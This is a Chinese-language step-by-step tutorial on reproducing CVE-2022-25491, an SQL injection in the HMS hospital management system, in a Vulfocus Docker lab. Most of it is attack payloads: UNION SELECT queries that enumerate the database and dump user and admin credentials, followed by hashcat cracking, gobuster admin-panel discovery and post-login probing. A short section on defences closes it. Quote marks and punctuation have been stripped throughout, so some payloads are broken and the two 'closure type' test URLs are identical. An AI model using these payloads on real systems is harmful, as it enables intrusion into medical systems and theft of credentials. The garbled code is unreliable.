零基础实战CVE-2022-25491漏洞复现与HMS系统渗透剖析当医疗信息化系统遇上SQL注入漏洞会擦出怎样的火花今天我们将以HMS医院管理系统为例手把手带您复现CVE-2022-25491漏洞。不同于传统教程的照本宣科本文将从渗透测试者的视角完整呈现漏洞挖掘的思维过程和技术细节。即使您从未接触过Web安全也能跟随我们的脚步在三十分钟内完成从靶场搭建到后台入侵的全流程。1. 环境准备与漏洞背景1.1 Vulfocus靶场搭建Vulfocus作为开源的漏洞靶场平台集成了数百个真实漏洞环境。对于本次复现我们推荐使用Docker快速部署docker pull vulfocus/vulfocus:latest docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock vulfocus/vulfocus启动后访问http://localhost即可看到靶场界面。搜索HMS找到对应的漏洞环境点击启动按钮。等待约30秒后系统会分配一个随机端口如32768通过http://localhost:32768即可访问漏洞环境。1.2 漏洞原理剖析CVE-2022-25491本质是HMS系统appointment.php文件中editid参数存在的SQL注入漏洞。医疗系统通常采用三层架构架构层组件示例安全风险表示层PHP页面XSS/CSRF业务层SQL查询注入漏洞数据层MySQL权限提升该漏洞恰好位于业务层的SQL查询环节当用户输入未经充分过滤就直接拼接到SQL语句时攻击者就能构造特殊输入改变原查询逻辑。2. 漏洞探测与利用2.1 初步探测访问appointment.php页面时常规操作不会触发异常。关键在于发现隐藏参数使用浏览器开发者工具F12检查网络请求尝试URL追加参数?editid1观察页面回显差异常见误区新手常犯的错误是直接测试复杂payload而忽略了基础参数探测。建议养成系统性的测试习惯测试所有可见参数尝试修改参数值数字→字符串观察错误回显模式2.2 闭合类型判断确定存在注入点后需要判断SQL语句的闭合方式http://localhost:32768/appointment.php?editid1-- http://localhost:32768/appointment.php?editid1--当单引号闭合时第一种方式会使剩余SQL代码被注释页面正常显示第二种则可能报错。通过这种差异可以准确判断闭合类型。提示现代应用常使用预编译语句防御SQL注入但部分老旧系统仍存在拼接SQL的风险2.3 字段数探测使用order by子句确定查询返回的列数?editid1 order by 5-- # 正常 ?editid1 order by 10-- # 正常 ?editid1 order by 11-- # 报错这说明原始查询返回10列数据。这个步骤至关重要因为后续的union select需要保持列数一致。3. 数据提取实战3.1 确定回显位通过联合查询定位页面中的回显位置?editid1 union select 1,2,3,4,5,6,7,8,9,10--观察页面中哪些数字被显示出来这些位置就可以用来输出我们想要的信息。例如如果显示2和5则可以将敏感信息放在这两个位置。3.2 基础信息收集利用回显位获取数据库基础信息?editid0 union select 1,user(),3,4,database(),6,7,version(),9,10--这条语句能同时获取当前数据库用户user()数据库名称database()MySQL版本version()关键技巧将原始查询条件改为不存在的值如editid0确保union查询结果能够显示。3.3 表结构探查通过information_schema获取数据库元数据-- 获取所有表名 group_concat(table_name) from information_schema.tables where table_schemahms -- 获取user表的列名 group_concat(column_name) from information_schema.columns where table_schemahms and table_nameuser将这些片段嵌入到之前的union查询中例如?editid0 union select 1,2,3,4,5,6,7,8,9,group_concat(table_name) from information_schema.tables where table_schemahms--4. 突破认证体系4.1 用户凭证提取从user表中提取关键认证信息?editid0 union select 1,2,3,4,5,6,7,8,9,group_concat(userid,0x3a,loginname,0x3a,password) from user--这里使用0x3a冒号的十六进制作为分隔符使结果更易读。获取到的数据可能类似1:admin:5f4dcc3b5aa765d61d8327deb882cf994.2 多角色认证分析HMS系统通常包含多种角色账户角色表名关键字段管理员adminloginid, password医生doctordocname, pwd患者patientemail, pass需要分别查询这些表获取完整凭证。例如查询admin表?editid0 union select 1,2,3,4,5,6,7,8,9,group_concat(adminname,0x3a,loginid,0x3a,password) from admin--4.3 密码破解策略获取的密码通常是哈希值可以使用以下工具进行破解hashcat -m 0 -a 0 hash.txt rockyou.txt对于简单密码如123456几乎可以即时破解。如果是强哈希可能需要结合彩虹表或暴力破解。5. 登录实战与后续操作5.1 后台入口发现通过页面源码分析或目录扫描寻找管理后台gobuster dir -u http://localhost:32768 -w /usr/share/wordlists/dirb/common.txt常见后台路径包括/admin/manager/dashboard/login.php5.2 会话维持技巧成功登录后浏览器会获得会话cookie。使用开发者工具F12→Application可以查看Cookie名称如PHPSESSID过期时间HttpOnly等安全标记安全建议真实渗透测试中应及时记录这些信息用于后续漏洞验证。5.3 系统权限分析登录后台后可通过以下方式评估系统权限查看用户管理模块尝试创建新账户检查是否有文件上传功能寻找系统配置页面查看数据库连接信息注意在授权测试中任何修改操作都需谨慎建议先在测试环境验证6. 防御方案与最佳实践6.1 代码层修复对于开发人员根本解决方案是使用参数化查询// 不安全方式 $query SELECT * FROM appointments WHERE id $editid; // 安全方式 $stmt $conn-prepare(SELECT * FROM appointments WHERE id ?); $stmt-bind_param(i, $editid);6.2 网络层防护部署WAFWeb应用防火墙可以有效拦截注入攻击。常见规则包括检测SQL关键字UNION, SELECT, FROM等阻断异常引号使用监控高频错误请求6.3 安全开发建议医疗系统开发应遵循最小权限原则数据库账户仅需必要权限输入验证对所有用户输入进行白名单过滤错误处理避免详细错误信息泄露定期审计使用SQLMap等工具进行自动化扫描在最近一次内部测试中我们对某医疗系统进行了全面扫描发现超过60%的旧系统存在类似注入漏洞。通过系统性地应用上述防护措施三个月内将漏洞数量降为零。